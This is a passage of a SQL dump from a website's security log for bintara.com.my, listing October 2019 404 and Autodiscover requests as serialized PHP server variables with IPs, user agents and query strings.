Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"466A7234-49A9-46D1-A548-D9030381B50D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbJ7J0wZdGEajccge0GpRwAAAJQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"110.159.79.128\";s:11:\"REMOTE_PORT\";s:5:\"17281\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJ7J0wZdGEajccge0GpRwAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571978023.1708\";s:12:\"REQUEST_TIME\";s:10:\"1571978023\";}}','notice','2019-10-25 04:33:46','2019-10-25 04:33:43',35285032,37093448,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'110.159.79.128'),(29036,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:109:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.188.84.139\";s:11:\"REMOTE_PORT\";s:5:\"55858\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJq2J6EeNO1SEOj8RyV9AAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571973848.7838\";s:12:\"REQUEST_TIME\";s:10:\"1571973848\";}}','notice','2019-10-25 03:24:10','2019-10-25 03:24:09',34537432,36337528,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'5.188.84.139'),(29037,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/license.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/license.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbJ0nkwZdGEajccge0GkGgAAAJE\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/license.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbJ0nkwZdGEajccge0GkGgAAAJE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"42302\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/license.php\";s:10:\"SCRIPT_URL\";s:12:\"/license.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJ0nkwZdGEajccge0GkGgAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571976350.4181\";s:12:\"REQUEST_TIME\";s:10:\"1571976350\";}}','notice','2019-10-25 04:05:52','2019-10-25 04:05:50',34587456,36397768,'https://bintara.com.my/license.php',1,0,'193.106.30.99'),(29034,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:129:\"text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:19:\"http://bintara.net/\";s:15:\"HTTP_USER_AGENT\";s:104:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.246.123.212\";s:11:\"REMOTE_PORT\";s:5:\"17384\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJMQpjYFNkk@7UTzt2XLwAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571966018.7897\";s:12:\"REQUEST_TIME\";s:10:\"1571966018\";}}','notice','2019-10-25 01:13:41','2019-10-25 01:13:39',35027664,36837504,'https://bintara.com.my/?page_id=18',1,0,'89.246.123.212'),(29035,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C75CB0FF-1EB7-489D-950F-736372F11A75\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbJqX56EeNO1SEOj8RyVugAAABU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"203.106.173.105\";s:11:\"REMOTE_PORT\";s:5:\"60535\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJqX56EeNO1SEOj8RyVugAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571973727.1108\";s:12:\"REQUEST_TIME\";s:10:\"1571973727\";}}','notice','2019-10-25 03:22:10','2019-10-25 03:22:07',35281288,37076024,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.105'),(29033,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5B5124EB-C2AE-43DD-B0E3-DB91DD7C4E57\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbJCaOPGRWqHYnad24O7EQAAAEQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"203.106.173.105\";s:11:\"REMOTE_PORT\";s:5:\"49794\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJCaOPGRWqHYnad24O7EQAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571963496.7416\";s:12:\"REQUEST_TIME\";s:10:\"1571963496\";}}','notice','2019-10-25 00:31:38','2019-10-25 00:31:37',34883392,36681688,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.105'),(29032,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9251A84D-F61D-4DDE-A4BF-63281F09DBC9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbJB7ePGRWqHYnad24O6zwAAAEE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"203.106.173.105\";s:11:\"REMOTE_PORT\";s:5:\"49687\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbJB7ePGRWqHYnad24O6zwAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571963373.6945\";s:12:\"REQUEST_TIME\";s:10:\"1571963373\";}}','notice','2019-10-25 00:29:36','2019-10-25 00:29:34',35275184,37074808,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.105'),(29031,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.87.184\";s:11:\"REMOTE_PORT\";s:5:\"38018\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbIy7oethpukHqSvdSbZLgAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571959534.8265\";s:12:\"REQUEST_TIME\";s:10:\"1571959534\";}}','notice','2019-10-24 23:25:36','2019-10-24 23:25:35',34539288,36349296,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'199.34.87.184'),(29030,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:122:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fonlineelectronicsdeals.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:120:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fonlineelectronicsdeals.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.87.184\";s:11:\"REMOTE_PORT\";s:5:\"40374\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADM